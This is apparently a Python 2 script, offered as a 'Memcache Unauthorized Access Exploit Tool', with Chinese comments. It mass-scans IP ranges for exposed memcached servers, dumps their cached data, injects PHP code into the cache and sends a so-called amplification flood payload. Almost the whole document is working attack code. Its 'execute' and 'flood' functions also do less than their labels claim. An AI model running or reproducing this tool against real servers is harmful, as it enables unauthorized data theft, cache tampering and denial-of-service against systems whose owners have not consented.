1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161
|
import socket import argparse from threading import Thread, Lock from Queue import Queue
class MemcacheExploit: def __init__(self, timeout=5): self.timeout = timeout self.lock = Lock() self.q = Queue() def check_vulnerable(self, ip, port=11211): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(self.timeout) s.connect((ip, port)) s.send("stats\r\n") result = s.recv(1024) s.close() if "STAT version" in result: with self.lock: print("[+] Memcache Unauthorized: {}:{}".format(ip, port)) print("[*] Server Info:\n{}".format(result.strip())) return True except Exception as e: pass return False def execute_command(self, ip, port, command): """通过Memcache执行系统命令(需要服务器配置不当)""" try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(self.timeout) s.connect((ip, port)) if command.startswith("php:"): php_code = command[4:] s.send("set injected 0 0 {}\r\n{}\r\n".format(len(php_code), php_code)) result = s.recv(1024) if "STORED" in result: print("[+] PHP code injected successfully") s.close() except Exception as e: print("[-] Error executing command: {}".format(str(e))) def dump_data(self, ip, port): """尝试转储Memcache中的数据""" try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(self.timeout) s.connect((ip, port)) s.send("stats items\r\n") items = s.recv(4096) s.send("stats slabs\r\n") slabs = s.recv(4096) s.send("stats cachedump 1 100\r\n") dump = s.recv(8192) s.close() print("[*] Memcache Data Dump from {}:{}".format(ip, port)) print("\n[+] Items:\n{}".format(items)) print("\n[+] Slabs:\n{}".format(slabs)) print("\n[+] Cachedump:\n{}".format(dump)) except Exception as e: print("[-] Error dumping data: {}".format(str(e))) def flood_attack(self, ip, port, size=1024): """利用Memcache进行放大攻击测试""" try: payload = "\x00\x01\x00\x00\x00\x01\x00\x00gets a" + "a" * size + "\r\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(self.timeout) s.connect((ip, port)) s.send(payload) s.close() print("[+] Flood payload sent to {}:{}".format(ip, port)) except Exception as e: print("[-] Error in flood attack: {}".format(str(e))) def worker(self): while True: ip, port, action = self.q.get() try: if action == "check": self.check_vulnerable(ip, port) elif action == "dump": if self.check_vulnerable(ip, port): self.dump_data(ip, port) finally: self.q.task_done() def scan_range(self, targets, threads=10, action="check"): for i in range(threads): t = Thread(target=self.worker) t.daemon = True t.start() for target in targets: if ":" in target: ip, port = target.split(":") else: ip, port = target, 11211 self.q.put((ip, int(port), action)) self.q.join()
def main(): parser = argparse.ArgumentParser(description="Memcache Unauthorized Access Exploit Tool") parser.add_argument("-t", "--target", help="Target IP (e.g. 192.168.1.1 or 192.168.1.1:11211)") parser.add_argument("-f", "--file", help="File containing target IPs (one per line)") parser.add_argument("-p", "--port", type=int, default=11211, help="Memcache port (default: 11211)") parser.add_argument("-a", "--action", choices=["check", "dump", "flood", "execute"], default="check", help="Action to perform (default: check)") parser.add_argument("-c", "--command", help="Command to execute (use with --action execute)") parser.add_argument("-T", "--threads", type=int, default=10, help="Number of threads (default: 10)") parser.add_argument("--timeout", type=int, default=5, help="Connection timeout (default: 5)") args = parser.parse_args() exploit = MemcacheExploit(args.timeout) targets = [] if args.file: with open(args.file) as f: targets = [line.strip() for line in f if line.strip()] elif args.target: targets = [args.target] else: parser.print_help() return if args.action == "check": exploit.scan_range(targets, args.threads, "check") elif args.action == "dump": exploit.scan_range(targets, args.threads, "dump") elif args.action == "flood": for target in targets: ip = target.split(":")[0] if ":" in target else target exploit.flood_attack(ip, args.port) elif args.action == "execute" and args.command: for target in targets: ip = target.split(":")[0] if ":" in target else target if exploit.check_vulnerable(ip, args.port): exploit.execute_command(ip, args.port, args.command)
if __name__ == '__main__': main()
|